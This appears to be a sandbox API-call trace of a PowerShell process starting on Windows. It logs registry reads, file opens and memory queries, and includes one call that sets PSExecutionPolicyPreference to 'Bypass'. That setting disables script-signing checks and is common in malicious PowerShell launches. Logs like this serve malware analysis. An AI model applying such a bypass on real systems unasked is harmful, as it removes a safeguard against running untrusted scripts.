	[0111.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.671] GetConsoleWindow () returned 0x60192
	[0136.707] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0137.015] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0137.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.015] CoTaskMemFree (pv=0x46e9b0) 
	[0137.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.801] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0141.801] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.801] CoTaskMemFree (pv=0x46e9b0) 
	[0141.802] CoTaskMemAlloc (cb=0xcc) returned 0x4627f0
	[0141.802] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4627f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.802] CoTaskMemFree (pv=0x4627f0) 
	[0141.803] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x29db18 | out: phkResult=0x29db18*=0x1cc) returned 0x0
	[0141.803] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29da9c, lpData=0x0, lpcbData=0x29da98*=0x0 | out: lpType=0x29da9c*=0x2, lpData=0x0, lpcbData=0x29da98*=0x6c) returned 0x0
	[0141.803] CoTaskMemAlloc (cb=0x70) returned 0x3f4460
	[0141.803] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29da6c, lpData=0x3f4460, lpcbData=0x29da68*=0x6c | out: lpType=0x29da6c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x29da68*=0x6c) returned 0x0
	[0141.803] CoTaskMemFree (pv=0x3f4460) 
	[0141.803] CoTaskMemAlloc (cb=0xcc) returned 0x4627f0
	[0141.803] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x4627f0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.803] CoTaskMemFree (pv=0x4627f0) 
	[0141.803] CoTaskMemAlloc (cb=0xcc) returned 0x4627f0
	[0141.803] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4627f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.803] CoTaskMemFree (pv=0x4627f0) 
	[0141.807] RegCloseKey (hKey=0x1cc) returned 0x0
	[0141.807] CoTaskMemAlloc (cb=0xcc) returned 0x4627f0
	[0141.807] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4627f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.807] CoTaskMemFree (pv=0x4627f0) 
	[0141.807] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x29db18 | out: phkResult=0x29db18*=0x1cc) returned 0x0
	[0141.807] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29da9c, lpData=0x0, lpcbData=0x29da98*=0x0 | out: lpType=0x29da9c*=0x0, lpData=0x0, lpcbData=0x29da98*=0x0) returned 0x2
	[0141.807] RegCloseKey (hKey=0x1cc) returned 0x0
	[0145.923] CoTaskMemAlloc (cb=0x20c) returned 0x40b300
	[0145.923] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x40b300 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.582] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0146.583] GetFileType (hFile=0x330) returned 0x1
	[0146.583] SetErrorMode (uMode=0x1) returned 0x1
	[0146.583] GetFileType (hFile=0x330) returned 0x1
	[0146.587] ReadFile (in: hFile=0x330, lpBuffer=0x2cc85e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d718, lpOverlapped=0x0 | out: lpBuffer=0x2cc85e0*, lpNumberOfBytesRead=0x29d718*=0x1000, lpOverlapped=0x0) returned 1
	[0146.589] ReadFile (in: hFile=0x330, lpBuffer=0x2cc85e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d718, lpOverlapped=0x0 | out: lpBuffer=0x2cc85e0*, lpNumberOfBytesRead=0x29d718*=0x1000, lpOverlapped=0x0) returned 1
	[0146.590] ReadFile (in: hFile=0x330, lpBuffer=0x2cc85e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d718, lpOverlapped=0x0 | out: lpBuffer=0x2cc85e0*, lpNumberOfBytesRead=0x29d718*=0x1000, lpOverlapped=0x0) returned 1
	[0146.591] ReadFile (in: hFile=0x330, lpBuffer=0x2cc85e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d718, lpOverlapped=0x0 | out: lpBuffer=0x2cc85e0*, lpNumberOfBytesRead=0x29d718*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.591] ReadFile (in: hFile=0x330, lpBuffer=0x2cc7a3b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x29d718, lpOverlapped=0x0 | out: lpBuffer=0x2cc7a3b*, lpNumberOfBytesRead=0x29d718*=0x0, lpOverlapped=0x0) returned 1
	[0146.591] ReadFile (in: hFile=0x330, lpBuffer=0x2cc85e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d718, lpOverlapped=0x0 | out: lpBuffer=0x2cc85e0*, lpNumberOfBytesRead=0x29d718*=0x0, lpOverlapped=0x0) returned 1
	[0146.593] CloseHandle (hObject=0x330) returned 1
	[0148.286] GetSystemInfo (in: lpSystemInfo=0x29c3b0 | out: lpSystemInfo=0x29c3b0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.287] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.494] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.304] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.305] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.306] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.307] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.307] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.313] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.316] VirtualQuery (in: lpAddress=0x29c460, lpBuffer=0x29d320, dwLength=0x30 | out: lpBuffer=0x29d320*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.524] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0159.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.525] CoTaskMemFree (pv=0x46e9b0) 
	[0159.781] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d918 | out: phkResult=0x29d918*=0x2e4) returned 0x0
	[0159.781] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x29d92c, lpData=0x0, lpcbData=0x29d928*=0x0 | out: lpType=0x29d92c*=0x1, lpData=0x0, lpcbData=0x29d928*=0x74) returned 0x0
	[0159.781] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x29d89c, lpData=0x0, lpcbData=0x29d898*=0x0 | out: lpType=0x29d89c*=0x1, lpData=0x0, lpcbData=0x29d898*=0x74) returned 0x0
	[0159.781] CoTaskMemAlloc (cb=0x78) returned 0x3f4460
	[0159.781] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x29d86c, lpData=0x3f4460, lpcbData=0x29d868*=0x74 | out: lpType=0x29d86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x29d868*=0x74) returned 0x0
	[0160.094] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0160.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.095] CoTaskMemFree (pv=0x46e9b0) 
	[0160.102] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0160.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.102] CoTaskMemFree (pv=0x46e9b0) 
	[0160.104] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0160.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.104] CoTaskMemFree (pv=0x46e9b0) 
	[0160.106] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0160.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.106] CoTaskMemFree (pv=0x46e9b0) 
	[0160.159] ReadFile (in: hFile=0x32c, lpBuffer=0x323f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323f408*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0160.184] ReadFile (in: hFile=0x32c, lpBuffer=0x323f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323f408*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0160.191] ReadFile (in: hFile=0x32c, lpBuffer=0x323f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323f408*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0160.194] ReadFile (in: hFile=0x32c, lpBuffer=0x323f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323f408*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0160.201] ReadFile (in: hFile=0x32c, lpBuffer=0x323f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323f408*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0160.203] ReadFile (in: hFile=0x32c, lpBuffer=0x323f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323f408*, lpNumberOfBytesRead=0x29d488*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.206] ReadFile (in: hFile=0x32c, lpBuffer=0x323e952, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323e952*, lpNumberOfBytesRead=0x29d488*=0x0, lpOverlapped=0x0) returned 1
	[0160.208] ReadFile (in: hFile=0x32c, lpBuffer=0x323f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x323f408*, lpNumberOfBytesRead=0x29d488*=0x0, lpOverlapped=0x0) returned 1
	[0160.211] CloseHandle (hObject=0x32c) returned 1
	[0160.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.372] SetErrorMode (uMode=0x1) returned 0x1
	[0160.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29d430 | out: lpFileInformation=0x29d430*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.670] SetErrorMode (uMode=0x1) returned 0x1
	[0160.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.670] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d518 | out: phkResult=0x29d518*=0x32c) returned 0x0
	[0160.670] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d49c, lpData=0x0, lpcbData=0x29d498*=0x0 | out: lpType=0x29d49c*=0x1, lpData=0x0, lpcbData=0x29d498*=0x56) returned 0x0
	[0160.670] CoTaskMemAlloc (cb=0x5a) returned 0x4583e0
	[0160.670] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d46c, lpData=0x4583e0, lpcbData=0x29d468*=0x56 | out: lpType=0x29d46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29d468*=0x56) returned 0x0
	[0160.670] CoTaskMemFree (pv=0x4583e0) 
	[0160.670] RegCloseKey (hKey=0x32c) returned 0x0
	[0160.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.678] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x6f556a12, Data2=0x2688, Data3=0x4d7d, Data4=([0]=0x80, [1]=0x6e, [2]=0xed, [3]=0xa7, [4]=0x30, [5]=0x3, [6]=0x9e, [7]=0x8c))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xd998c4ec, Data2=0x30a, Data3=0x4834, Data4=([0]=0xa8, [1]=0x3c, [2]=0x9d, [3]=0x2c, [4]=0xe6, [5]=0x7e, [6]=0x3, [7]=0xf))) returned 0x0
	[0164.944] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xb3c7e1e, Data2=0x9740, Data3=0x4371, Data4=([0]=0xa2, [1]=0x56, [2]=0xc0, [3]=0x77, [4]=0xc6, [5]=0x64, [6]=0x15, [7]=0x9c))) returned 0x0
	[0164.949] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x908c3128, Data2=0xf3f7, Data3=0x4957, Data4=([0]=0x92, [1]=0xdc, [2]=0x55, [3]=0x75, [4]=0x48, [5]=0xdb, [6]=0x1f, [7]=0x4))) returned 0x0
	[0164.951] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x3c5561d0, Data2=0x120c, Data3=0x4809, Data4=([0]=0x93, [1]=0x83, [2]=0xba, [3]=0x77, [4]=0x14, [5]=0x21, [6]=0x97, [7]=0xe))) returned 0x0
	[0164.951] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x70071383, Data2=0xd234, Data3=0x417e, Data4=([0]=0xbb, [1]=0x3f, [2]=0x58, [3]=0x26, [4]=0xaf, [5]=0x9b, [6]=0x2a, [7]=0xab))) returned 0x0
	[0164.952] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x4510188d, Data2=0x62e, Data3=0x4359, Data4=([0]=0x8f, [1]=0xee, [2]=0xce, [3]=0x16, [4]=0xe7, [5]=0xa7, [6]=0x89, [7]=0xbb))) returned 0x0
	[0164.953] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xddc88765, Data2=0x5dc2, Data3=0x4306, Data4=([0]=0xa0, [1]=0x25, [2]=0xde, [3]=0x95, [4]=0xe4, [5]=0x52, [6]=0x10, [7]=0xf3))) returned 0x0
	[0164.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.954] SetErrorMode (uMode=0x1) returned 0x1
	[0164.954] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0164.954] GetFileType (hFile=0x32c) returned 0x1
